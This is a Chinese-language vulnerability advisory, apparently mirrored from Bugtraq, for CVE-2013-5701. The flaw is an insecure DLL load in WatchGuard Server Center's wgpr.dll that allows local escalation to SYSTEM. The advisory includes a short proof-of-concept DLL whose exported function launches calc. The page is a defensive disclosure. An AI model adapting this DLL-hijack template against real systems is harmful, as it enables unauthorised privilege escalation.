Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Watchguard Server Center wgpr.dll不安全库加载本地权限提升漏洞(CVE-2013-5701)

发布日期:2013-09-08
更新日期:2013-09-11受影响系统:
WatchGuard Watchguard Server Center 11.7.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62261
CVE(CAN) ID: CVE-2013-5701Watchguard Server Center是设置、配置、备份、存储所有WatchGuard System Manager服务器的应用。Watchguard Server Center 11.7.4、11.7.3的wgpr.dll存在不安全库加载本地权限提升漏洞,本地攻击者可利用此漏洞获取SYSTEM权限。<*来源:Julien Ahrens
 
  链接:http://seclists.org/fulldisclosure/2013/Sep/43?utm_source=twitterfeed&utm_medium=twitter
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#include <windows.h>#define DLL_EXPORT __declspec(dllexport)#ifdef __cplusplus
extern "C"
{
#endifvoid DLL_EXPORT wgpr_library_get()
{
    WinExec("calc",0);
}#ifdef __cplusplus
}
#endif建议:
--------------------------------------------------------------------------------
厂商补丁:WatchGuard
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.watchguard.compyOpenSSL SSL客户端证书验证安全绕过漏洞AjaXplorer文件泄露及文件上传漏洞相关资讯      Watchguard Server Center  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法